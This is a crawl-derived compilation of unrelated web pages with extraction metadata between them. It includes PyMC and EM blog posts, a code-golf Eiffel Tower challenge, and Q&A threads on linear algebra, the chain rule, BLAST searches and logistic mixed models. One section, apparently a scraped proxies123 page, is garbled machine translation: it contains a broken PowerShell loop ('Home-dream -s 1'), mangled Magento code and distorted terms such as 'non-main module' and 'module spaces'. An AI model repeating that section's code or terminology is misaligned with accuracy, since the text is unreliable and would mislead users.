Comments Off on MCMC in Python: How to set a custom prior with joint distribution on two parameters in PyMC
Filed under Uncategorized
## MCMC in Python: random effects logistic regression in PyMC3
It has been a while since I visited my pymc-examples repository, but I got a request there a few weeks ago about the feasibility of upgrading the Seeds Example of a random effects logistic regression model for PyMC3. It turns out that this was not very time consuming, which must mean I’m starting to understand the changes between PyMC2 and PyMC3.
See them side-by-side here (PyMC2) and here (PyMC3).
Comments Off on MCMC in Python: random effects logistic regression in PyMC3
Filed under statistics
## Sequential Monte Carlo in PyMC?
I’ve been reading about Sequential Monte Carlo recently, and I think it will fit well into the PyMC3 framework. I will give it a try when I have a free minute, but maybe someone else will be inspired to try it first. This paper includes some pseudocode.
Comments Off on Sequential Monte Carlo in PyMC?
Filed under MCMC
## PyMC3 coming along
I have been watching the development of PyMC3 from a distance for some time now, and finally have had a chance to play around with it myself. It is coming along quite nicely! Here is a notebook Kyle posted to the mailing list recently which has a clean demonstration of using Normal and Laplace likelihoods in linear regression: http://nbviewer.ipython.org/c212194ecbd2ee050192/variable_selection.ipynb
Comments Off on PyMC3 coming along
Filed under statistics
## Regression Modeling in Python: Patsy Spline
I’ve been watching the next generation of PyMC come together over the last months, and there is some very exciting stuff happening. The part on GLM regression led me to a different project which is also of interest, a regression modeling minilanguage, called Patsy which “brings the convenience of R ‘formulas’ to Python.”
This package recently introduced a method for spline regression, and avoided all puns in naming. Impressive.
Comments Off on Regression Modeling in Python: Patsy Spline
Filed under statistics
## ML in Python: Naive Bayes the hard way
A recent question on the PyMC mailing list inspired me to make a really inefficient version of the Naive Bayes classifier. Enjoy.
Comments Off on ML in Python: Naive Bayes the hard way
Filed under machine learning
## Classic EM in Python: Multinomial sampling
In the classic paper on the EM algorithm, the extensive example section begins with a multinomial modeling example that is theoretically very similar to the warm-up problem on 197 animals:
We can think of the complete data as an $n \times p$ matrix $x$ whose $(i,j)$ element is unity if the $i$-th unit belongs in the $j$-th of $p$ possible cells, and is zero otherwise. The $i$-th row of $x$ contains $p-1$ zeros and one unity, but if the $i$-th unit has incomplete data, some of the indicators in the $i$-th row of $x$ are observed to be zero, while the others are missing and we know only that one of them must be unity. The E-step then assigns to the missing indicators fractions that sum to unity within each unit, the assigned values being expectations given the current estimate of $\phi$. The M-step then becomes the usual estimation of $\phi$ from the observed and assigned values of the indicators summed over the units.
In practice, it is convenient to collect together those units with the same pattern of missing indicators, since the filled in fractional counts will be the same for each; hence one may think of the procedure as filling in estimated counts for each of the missing cells within each group of units having the same pattern of missing data.
When I first made some data to try this out, it looked like this:
import pymc as mc, numpy as np, pandas as pd, random
n = 100000
p = 5
pi_true = mc.rdirichlet(np.ones(p))
pi_true = np.hstack([pi_true, 1-pi_true.sum()])
x_true = mc.rmultinomial(1, pi_true, size=n)
x_obs = array(x_true, dtype=float)
for i in range(n):
for j in random.sample(range(p), 3):
x_obs[i,j] = np.nan
At first, I was pretty pleased with myself when I managed to make a PyMC model and an E-step and M-step that converged to something like the true value of $\pi$. The model is not super slick:
pi = mc.Uninformative('pi', value=np.ones(p)/p)
x_missing = np.isnan(x_obs)
x_initial = x_obs.copy()
x_initial[x_missing] = 0.
for i in range(n):
if x_initial[i].sum() == 0:
j = np.where(x_missing[i])[0][0]
x_initial[i,j] = 1.
@mc.stochastic
def x(pi=pi, value=x_initial):
return mc.multinomial_like(value, 1, pi)
@mc.observed
def y(x=x, value=x_obs):
if np.allclose(x[~x_missing], value[~x_missing]):
return 0
else:
return -np.inf
And the E-step/M-step parts are pretty simple:
def E_step():
x_new = array(x_obs, dtype=float)
for i in range(n):
if x_new[i, ~x_missing[i]].sum() == 0:
conditional_pi_sum = pi.value[x_missing[i]].sum()
for j in np.where(x_missing[i])[0]:
x_new[i,j] = pi.value[j] / conditional_pi_sum
else:
x_new[i, x_missing[i]] = 0.
x.value = x_new
def M_step():
counts = x.value.sum(axis=0)
pi.value = (counts / counts.sum())
But the way the values converge does look nice:
The thing that made me feel silly was comparing this fancy-pants approach to the result of averaging all of the non-empty cells of x_obs:
ests = pd.DataFrame(dict(pr=pi_true, true=x_true.mean(0),
naive=pd.DataFrame(x_obs).mean(), em=pi.value),
columns=['pr', 'true', 'naive', 'em']).sort('true')
print np.round_(ests, 3)
pr true naive em
2 0.101 0.101 0.100 0.101
0 0.106 0.106 0.108 0.108
3 0.211 0.208 0.209 0.208
1 0.269 0.271 0.272 0.271
4 0.313 0.313 0.314 0.313
Simple averages are just as good as EM, for the simplest distribution I could think of based on the example, anyways.
To see why this EM business is worth the effort requires a more elaborate model of missingness. I made one, but it is a little bit messy. Can you make one that is nice and neat?
Comments Off on Classic EM in Python: Multinomial sampling
Filed under statistics, Uncategorized | 2021-04-15 15:00:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 15, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5320794582366943, "perplexity": 1856.7467186705846}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038085599.55/warc/CC-MAIN-20210415125840-20210415155840-00525.warc.gz"} |
https://codegolf.stackexchange.com/questions/23581/eiffel-tower-in-3d | # Eiffel Tower in 3D
This challenge asks you to draw the Eiffel Tower in 3D using different ASCII characters to represent the different sides, similar to this cube:
@@@
@@@@@@@@@
@@@@@@@@@@@@@@@
x@@@@@@@@@@@@&&
xxx@@@@@@@@&&&&
xxxxx@@@&&&&&&&
xxxxxx&&&&&&&&&
xxxxx&&&&&&&
xxx&&&&
x&&
Here is a picture of the Eiffel Tower for you to base your art on:
Your program will input a rotational angle of the side view, then print the Tower as if you were looking at it from that angle. The up/down angle does not need to be accounted for.
Score will be calculated as 1.25*votes - 0.25*length as a . Highest score wins.
• Accounting for the view angle is going to be a vexing/fun challenge. – Jonathan Van Matre Mar 9 '14 at 19:47
BBC BASIC, 66 chars
Emulator at bbcbasic.co.uk
A=PI/6FORJ=0TO83PRINTTAB(9+EXP(J/40)*SIN(A+J*PI/2),J/4);J MOD4:NEXT
With white space for clarity:
A=PI/6
FOR J=0 TO 83
PRINT TAB(9+EXP(J/40)*SIN(A+J*PI/2),J/4);J MOD4
NEXT
Input is hard coded in radians. Taking user input would add one character, but user would have to input in radians. Removing the MOD4 from the end would still produce a recognisable tower, but might violate the rule regarding character per side.
Basically plots a string of zeros at exp(J/40)*sin(A) vs J/4. Additional values of the sin are added for the remaining three legs.
• I hesitated to post this as I thought it was perhaps a little lazy. Then I saw the "500km away" answer and thought, why not! – Level River St Mar 9 '14 at 20:42
• Not bad, a lot better than "500km away" answer. At least you can tell what it is! – user10766 Mar 9 '14 at 20:53
• Looks more like a rocket. – Mukul Kumar Mar 10 '14 at 4:26
# PHP, 364 * 0.25 = 91
Accepts a viewing angle as a query string parameter of the form ?a=0, ?a=45, ?a=90, etc.
<pre><?php
$a=45*floor(.5+intval(@$_GET['a'])/45);
$e=array(array(".","|","==","X|","X|","X/","==|","^||","-./","__//","=====","^^-. /"," |__|"), array(".","|","==","X|","X|","X/","|=|","|^|","|./"," ///",":====",":|-. /","_| |_|")); echo "Angle: {$a}°\n\n";
foreach($e[$a&1] as $s){$p=str_pad($s,7);echo strrev($p).substr(strtr(\$p,'/','\\'),1)."\n";} ?>
</pre>
Examples:
a=135
Angle: 135°
.
|
===
|X|
|X|
/X\
|=|=|
|^|^|
/.|.\
/// \\\
====:====
/ .-|:|-. \
|_| |_| |_|
a=200 (rounded to nearest increment = 180°)
Angle: 180°
.
|
===
|X|
|X|
/X\
|===|
||^||
/.-.\
//___\\
=========
/ .-^^^-. \
|__| |__|
(Yes I know, the angular resolution isn't brilliant. I'll improve on that if I have time.)
# C# - 64 bytes
namespace System{class m{static void h(){Console.Write(".");}}}
Prints the Eiffel Tower viewed from 500 26.5 kilometers away. Takes the rotational angle as an argument.
Example usage:
eiffel.exe 90
# EDIT
I've made an approximation, and it should be about 26.5 kilometers away.
Let's consider the image below, taken from OP and edited to add a "." using the font Monospace 12 without anti-aliasing.
The "." is 2 pixels long and 1 pixels wide whereas the tower is 400 pixels long and 663 pixels wide(approximately).
Let's assume the tower is viewed from 100 meters away.
If we want to make it look like a 2x1 box, we would need to make it (again, approximately) 265.5 times smaller(200 times smaller for the height and 531 times smaller for the width).
If we multiply 265.5 with 100 meters, we get 26550 meters, which is 26.5 kilometers.
• There's a bug in your code. The output should be " " when viewed from 500km. – Comintern Mar 9 '14 at 20:21
• This is not funny. – John Dvorak Mar 9 '14 at 20:25
• @Comintern Actually no, it would be smaller than a . but bigger than an empty space. – user3188175 Mar 9 '14 at 20:37
• I'm less than 500km from the Eiffel Tower, but there's not a single pixel in view here :-D – r3mainer Mar 10 '14 at 15:26
• @squeamishossifrage Think of it as a view from space. Or even, assume it's in space. – user3188175 Mar 10 '14 at 15:49 | 2021-03-02 16:14:29 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.42305952310562134, "perplexity": 2506.413423916534}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178364027.59/warc/CC-MAIN-20210302160319-20210302190319-00215.warc.gz"} |
http://math.stackexchange.com/questions/231968/find-a-basis-for-the-set-of-vectors-in-mathbbr4-in-the-subspace-hyperplan?answertab=votes | # Find a basis for the set of vectors in $\mathbb{R}^4$ in the subspace (hyperplane) $x_1 +x_2 + 2x_3 + x_4 = 0, x_1 + 2x_2-x_3=0$
I am studying for a test, and this is one of the practice problems.
Find a basis for the set of vectors in $\mathbb{R}^4$ in the subspace (hyperplane) $x_1 +x_2 + 2x_3 + x_4 = 0, x_1 + 2x_2-x_3=0$
Can I say that the second plane is a linear combination of the first plane, and a basis for the first plane is $\{\begin{bmatrix} 1 & 0 & 0 & 1 \end{bmatrix}, \begin{bmatrix} 0 & 1 & 0 & -1 \end{bmatrix}, \begin{bmatrix} 0 & 0 & 2 & -2 \end{bmatrix}\}$, thus it is the basis for the hyperplane (both planes) in the subspace? If not, how do I find the basis?
-
Why is $(1,0,0,1)$ on the first plane? – wj32 Nov 7 '12 at 7:01
It might not be, I could be wrong. I just followed a heuristic I found online, since it doesn't seem to be in my textbook. – Grace C Nov 7 '12 at 7:08
Also, why do you say that the subspace is a hyperplane? It looks 2 dimensional to me. – wj32 Nov 7 '12 at 7:09
The actual problem itself says that in the question. – Grace C Nov 7 '12 at 7:11
Where is this problem from? – wj32 Nov 7 '12 at 7:18
I'm assuming you want to find a basis for the subspace $$S=\{(x_1,x_2,x_3,x_4) \in \mathbb{R}^4 \mid x_1+x_2+2x_3+x_4=0\;\mbox{and}\;x_1+2x_2-x_3=0\}.$$ The standard way to do this is to notice that $S$ is the kernel of the matrix $$\begin{bmatrix}1 & 1 & 2 & 1 \\ 1 & 2 & -1 & 0\end{bmatrix}.$$ Row reduce to get $$\begin{bmatrix}1 & 0 & 5 & 2 \\ 0 & 1 & -3 & -1\end{bmatrix}.$$ This tells you that a basis for $S$ is $\{(-5,3,1,0),(-2,1,0,1)\}$.
The last step comes from $I (x_1,x_2)^T + \pmatrix{5 & -2 \\ -3 & -1} (x_3,x_4)^T = 0$, which shows that when you select $x_3,x_4$, $x_1,x_2$ are completely defined. – copper.hat Nov 7 '12 at 7:31 | 2016-02-14 08:14:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.815523624420166, "perplexity": 182.3910344976636}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-07/segments/1454701171770.2/warc/CC-MAIN-20160205193931-00028-ip-10-236-182-209.ec2.internal.warc.gz"} |
https://www.physicsforums.com/threads/problem-in-applying-the-chain-rule.950712/ | Problem in applying the Chain Rule
Gold Member
Homework Statement
I am facing problem in applying the chain rule.
The question which I am trying to solve is,
" Find the second derivative of
"
The Attempt at a Solution
So, differentiated it the first time,
[BY CHAIN RULE]
And now to find the second derivative I differentiated it once again,
so,
=>
But this is a wrong answer.
Please tell me where am I doing the mistake in applying the chain rule?
I will be thankful for help!
Attachments
• 478 bytes Views: 537
• 478 bytes Views: 471
• 1.2 KB Views: 504
• 887 bytes Views: 488
• 1.4 KB Views: 514
• 1.3 KB Views: 487
Related Calculus and Beyond Homework Help News on Phys.org
fresh_42
Mentor
Homework Statement
I am facing problem in applying the chain rule.
The question which I am trying to solve is,
" Find the second derivative of View attachment 227541 "
Homework Equations
View attachment 227542
The Attempt at a Solution
So, differentiated it the first time,
View attachment 227543 [BY CHAIN RULE]
View attachment 227544
And now to find the second derivative I differentiated it once again,
so,
View attachment 227545
=>View attachment 227546
But this is a wrong answer.
Please tell me where am I doing the mistake in applying the chain rule?
I will be thankful for help!
You differentiated $\dfrac{d}{dx}(fg)$ to $\dfrac{d}{dx}(f)\cdot \dfrac{d}{dx}(g)$ which it is not, and it is not the chain rule.
Do you know the chain rule? I would have expected this information under point 2. of the template.
Ray Vickson
Homework Helper
Dearly Missed
Homework Statement
I am facing problem in applying the chain rule.
The question which I am trying to solve is,
" Find the second derivative of View attachment 227541 "
Homework Equations
View attachment 227542
The Attempt at a Solution
So, differentiated it the first time,
View attachment 227543 [BY CHAIN RULE]
View attachment 227544
And now to find the second derivative I differentiated it once again,
so,
View attachment 227545
=>View attachment 227546
But this is a wrong answer.
Please tell me where am I doing the mistake in applying the chain rule?
I will be thankful for help!
To get $d^2y/dt^2$ you need to apply the product rule to $dy/dt$. That will produce two terms, not one, although you can then simplify it down to one term again.
Please do NOT attach images; it makes it difficult to cite results and sub-results. Since you already used some kind of package to format your formulas, why not type them in here directly, using LaTeX?
Delta2
Homework Helper
Gold Member
Your mistake is not in the application of the chain rule but you don't seem to apply correctly the product rule. You have find $\frac{dy}{dt}$ as product of $t$ and $(t^2+1)^{-\frac{1}{2}}$. So to calculate the derivative of that product first apply correctly the product rule $\frac{d(fg)}{dt}=\frac{df}{dt}g+f\frac{dg}{dt}$ for $f(t)=t$ and $g(t)=(t^2+1)^{-\frac{1}{2}}$and then apply the chain rule to calculate correctly $\frac{dg}{dt}$. | 2020-04-02 20:07:59 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8054577708244324, "perplexity": 1094.6252890077826}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370507738.45/warc/CC-MAIN-20200402173940-20200402203940-00288.warc.gz"} |
https://www.biostars.org/p/250341/#250356 | Use BLAST's search on your own FASTA?
2
2
Entering edit mode
5.8 years ago
orlando.wong ▴ 60
Hello biostars,
I have a FASTA file of about 300 kbp & I have several sequences (400 bp - 800 bp) that I want to search in there.
I tried using BLAST, but I couldn't find the option to allow me to upload my own FASTA file in the Search Set box.
The EMBOSS water stops and lists the first hit, but the sequences occur multiple times throughout the FASTA files.
Does anyone have any other software or other ideas? Thank you!
BLAST sequence fasta • 2.6k views
4
Entering edit mode
5.8 years ago
Ram 38k
You can use the command line version of blast+ to create a database out of your sequences (using makeblastdb) and then blast your query sequence against this database. It is not possible to do what you want on the web.
2
Entering edit mode
5.8 years ago
biofalconch ▴ 560
Ok, what I make of that tool is that it is used to just align TWO sequences, so naturally it just ignores the rest. Adding to @Ram 's answer, you want to create a database for your fasta using makeblastdb (is as easy as makeblastdb -in file.fa -dbtype nucl -out database), once you have your database set, you can go on and run blastn (blastn -query file.fa -db database -out file.out -outfmt 6). Now, it depends on how you want your output (option -outfmt), I recommend reading more. This will give you a text output that can be more easily searched than using webtools. Hope it helps :)
0
Entering edit mode
Thanks so much for the BLAST command line commands. Was able to run it blazing fast in less than 0.5 seconds! | 2023-02-08 20:32:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1746707707643509, "perplexity": 3900.1306443962035}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500904.44/warc/CC-MAIN-20230208191211-20230208221211-00278.warc.gz"} |
https://proxies123.com/tag/module/ | ## cryptography – Diffie-Hellman with non-main module
When using the Diffie-Hellman key exchange, it is said that it is important to use a secure priming. However, if a non-main module with a sufficient length of bits is generated, is there an attack that can be used to recover the shared secret of the public communication (g, g ^ a, g ^ b, module) or to decrypt a message? encryption?
## linux – Error flooding is related to the alx module
My Linux box is flooded with the following error at a very high rate that makes journald have high CPU performance, which causes the CPU fan to start up. Interestingly, the network still works. Internet is not much help, we only find some irrelevant articles that makes at least several cores. Any ideas about what is happening?
Apr 20 13:18:09 ###. ##### Net kernel: alx 0000: 08: 00.0 eth0: fatal interrupt 0x4019607, restart
Apr 20 13:18:09 ###. ##### Net kernel: alx 0000: 08: 00.0 eth0: fatal interrupt 0x4019607, restart
Apr 20 13:18:09 ###. ##### Net kernel: alx 0000: 08: 00.0 eth0: fatal interrupt 0x4019607, restart
Here is the information of my box:
cat / etc / os-release
NAME = "openSUSE Leap"
VERSION = "42.3"
uname -a
Linux ###. ###### Net 4.4.176-96-default # 1 SMP Fri Mar 22 06:23:26 UTC 2019 (a0dd1b8) x86_64 x86_64 x86_64 GNU / Linux
lspci | grep -i ethernet
08: 00.0 Ethernet Controller: Qualcomm Atheros Killer E220x Gigabit Ethernet Controller (rev 10)
modinfo alx
File name: /lib/modules/4.4.176-96-default/kernel/drivers/net/ethernet/atheros/alx/alx.ko
Description: Ethernet network controller Qualcomm Atheros (R) AR816x / AR817x PCI-E
Author: Qualcomm Corporation,
author: Johannes Berg
alias: pci: v00001969d000010A0svSouth DakotaBCSouth CarolinaI*
alias: pci: v00001969d000010A1svSouth DakotaBCSouth CarolinaI*
alias: pci: v00001969d00001090svSouth DakotaBCSouth CarolinaI*
alias: pci: v00001969d0000E0A1svSouth DakotaBCSouth CarolinaI*
alias: pci: v00001969d0000E091svSouth DakotaBCSouth CarolinaI*
alias: pci: v00001969d00001091svSouth DakotaBCSouth CarolinaI*
depends: mdio
retpoline: and
intree: Y
## Powershell module, Posh-SSH: How is the sequence reading supposed to work in Posh-SSH?
I am trying to understand how the flow reading is supposed to work in Posh-SSH in order to arm a "wait action" function so that the script continues only after the remote command is completed.
The intent of the code shown below, when put together, is to initiate a "yum update" on the remote system (Linux, CentOS 7), then monitor the sequence to determine when the remote command has been completed and then move on to the next line of the script. It works "sometimes", but not always.
This code successfully configures a new SSH connection and defines a flow:
``````\$ hostIP = "Remote_Linux_Server_IP"
\$ centosCreds = "My_Credential_Object"
\$ pemFile = "My_Pem_File"
New-SSHSession-Computer Name \$ hostIP-Port 22-Credit \$ centosCreds -KeyFile \$ pemFile -ConnectionTimeout 120 -OperationTimeout 120 -AcceptKey
\$ stream = New-SSHShellStream -Index 0
``````
The execution of a remote command through the new sequence is quite easy:
``````Invoke-SSHStreamShellCommand -ShellStream \$ stream -Command "yum update"
``````
Executing the following while executing the Invoke-SSHStreamShellCommand (yum update) command returns a fragment of the remote command output as expected:
``````\$ stream.Read ()
``````
However, once the "yum update" is complete, the reading of the sequence returns only a blank value. The information I could find online indicates that reading the sequence should return the string of the command prompt of the remote system, but this does not seem to be the case.
Because the value returned by the read after the command has completed is blank, the "wait action" cycle that I am trying to assemble does not work consistently:
``````\$ promptString = "Regex_Matching_Remote_System_Command_Prompt"
\$ streamOut = \$ stream.Read ()
while (\$ streamOut - I do not like "\$ promptString") {
Home-dream -s 1
\$ streamOut = \$ stream.Read ()
}
``````
I'm not sure what I'm missing here: the documentation is limited and I have not been able to find many other examples of continuous Posh-SSH readings that match the behavior I'm seeing.
Any guidance or suggestion is appreciated.
Thank you.
## theme – Pass the custom module variable to the twig template
How can I pass a variable from my custom module to a twig field template?
My field template is "field – node – field – webform – show – visit.html.twig"
and my module is called "custommodule"
I tried this function according to the documentation but apparently I did not understand something correctly:
`````` logintosubmit_preprocess_field_node_field_webform_parliament_visit (array & \$ variables) {function
\$ VARIABLE_NAME = & # 39; my_variable & # 39 ;;
\$ variables['varname'] = \$ VARIABLE_NAME;
}
``````
## javascript – Division without using division, multiplication or module operators
Homework
Implement the division of two positive integers without using the
Division, multiplication or module operators. Returns the quotient as
An integer, ignoring the rest.
My solution
``````division of const = (dividend, divisor) => {
leave remainder = null;
leave quotient = 1;
sign of const = ((dividend> 0 and divisor <0) ||
(dividend < 0 && divisor > 0))?
~ 1: 1;
leave tempdividend = Math.abs (dividend);
let tempdivisor = Math.abs (divisor);
if (tempdivisor === tempdividend) {
rest = 0;
return Math.abs (sign);
} else if (tempdividend <tempdivisor) {
remainder = dividend <0?
sign <0? ~ tempdividend: tempdividend:
tempdividendo
returns 0;
}
while (tempdivisor << 1 <= tempdividend) {
tempdivisor = tempdivisor << 1;
quotient = quotient << 1;
}
quotient = dividend <0?
(sign <0? quotient: quotient) + division (~ (tempdividend-tempdivisor), divisor):
(sign <0? quotient: quotient) + division (tempdividend-tempdivisor, divisor);
return ratio;
}
``````
## module – Magento 1.9 adds custom field to multiple templates
I have a custom field that I would like to add to all areas in the admin panel where you can change the quantity of a product. I currently have the impression that I have to rewrite each template individually.
For example, to add the field to the inventory tab in the editing product, I made a rewrite of the template as follows:
Config.xml
``````
``````
Inventory.php
``````getAttribute (Mage_Catalog_Model_Product :: ENTITY, & # 39; stock_reason & # 39;);
if (\$ attribute-> usesSource ()) {
\$ options = \$ attribute-> getSource () -> getAllOptions (true);
}
returns \$ options;
}
public function __build ()
{
father :: __build ();
\$ this-> setTemplate (& # 39; vish / catalog / product / tab / inventory.phtml & # 39;);
}
}
``````
I think that, consequently, I would do the same for the attribute update action. This seems redundant and repetitive, and did I want to ask myself if I am doing this correctly? Or does the magento have a better way?
## magento2 – Magento 2: How to pass an existing module in the provider to the application folder?
I want to pass a module from the provider folder called "payment module" to the application folder. But every time I try to register this module in the application, an error appears that says that the module "already exists in the provider's folder". How can I register this module in the application folder? Can anybody help me please?
## Arithmetic geometry – Tower of module spaces in Scholze's theory.
My question is related to another one that I read here in Overflow. I'm reading Scholze's articles on moduli modules. $$p$$– Divisible groups and elliptical curves, and I'm very interested in the formal geometry involved there. In fact, I noticed that there is an article by Andreatta, Iovita and Pilloni, entitled Le halo spectral, which seems to deal with formal integral models of the Scholze towers.
First, if I understand Scholze well, speaking of elliptical curves, there is a perfect space. $$mathcal {X} _ { infty} ( epsilon)$$ What gives the "limit tilda" of modular curves. $$mathcal {X} _ { Gamma (p ^ n)} ( epsilon)$$ where each $$mathcal {X} _ { Gamma (p ^ n)} ( epsilon)$$ Describe the open neighborhoods of the ordinary place of $$Gamma_1 (N)$$ Modular curve, where the universal elliptical curve that comes from the recoil is not too supersingular. In fact, the construction of this object is done by calculating the generic fiber addition of the formal scheme. $$mathfrak {X} _ { infty} ( epsilon)$$ What is the real limit (in the category of formal schemes) of the integral models of $$mathcal {X} _ { Gamma_ (p ^ n)} ( epsilon)$$ where the maps in the reverse system are given by a survey of mod $$p$$-Frobenius.
A very similar construction is done in the chapter. $$6$$ of Andreatta, Iovita and the role of Pilloni, where they build the anti-canonical integral tower. $$mathfrak {X} _ { infty}$$ in exactly the same way, but working on a base that is a proper explosion of an integral model of Coleman's space weight. Now, I wonder if it is possible or not to interpret these spaces of "infinite" levels as spaces of elliptic curve modules plus a new type of level structure. Somewhere in Scholze's article it is mentioned that a point of $$mathcal {X} _ { infty}$$ finished $$text {Spa} (C, mathcal {O} _C)$$, where $$C$$ It is a complete algebraically closed extension of $$mathbb {Q} _p$$ corresponds to an elliptical curve on $$C$$ With a trivialization of your Tate module. Now, why is this true? It is not mentioned in Scholze and I can not prove it. In addition, a similar description is maintained for different types of points, p. $$text {Spa} (R, R ^ +)$$ with $$R$$ a perfect $$mathbb {Q} _p$$-algebra? Also, does the same interpretation hold for its formal integral model? And what about the tower of Andreatta, Iovita and Pilloni? Is it true that you parametrize elliptic curves with $$p$$Divisible groups that play the role of the canonical subgroup? The point is essentially, does this object back off a universal elliptical curve? What level level does a similar elliptical curve have? | 2019-04-23 14:04:34 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 19, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3159039616584778, "perplexity": 5064.583479872285}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578605510.53/warc/CC-MAIN-20190423134850-20190423160850-00216.warc.gz"} |
https://stats.stackexchange.com/questions/191810/repeated-measures-random-effects-for-logistic-regression-in-r | # Repeated measures - random effects for logistic regression in R?
## Study design
504 individuals were all sampled 2 times. Once before and once after a celebration.
The goal is to investigate if this event (Celebration) as well as working with animals (sheepdog) have an influence on the probability that an individual gets infected by a parasite. (out of 1008 observations only 22 are found to be infected)
Variables
• dependent variable = "T_hydat" (infected or not)
(most predictiv variables are categorical)
• "Celebration" (yes/no)
• "sex" (m/f)
• "RelAge" (5 levels)
• "SheepDog" (yes/no)
• "Area" (geographical area = 4 levels)
• "InfectionPeriodT_hydat" (continuous --> Nr Days after deworming")
• "Urbanisation (3 levels)
## Question 1:
1) Should I include Individual-ID ("ID") as a random Effekt as I sampled each Ind. 2 times? (Pseudoreplication?)
mod_fail <- glmer( T_hydat ~ Celebration + Sex + RelAge + SheepDog + InfectionPeriodT_hydat + Urbanisation + (1|ID), family = binomial)
Warnmeldungen:
1: In (function (fn, par, lower = rep.int(-Inf, n), upper = rep.int(Inf, :
failure to converge in 10000 evaluations
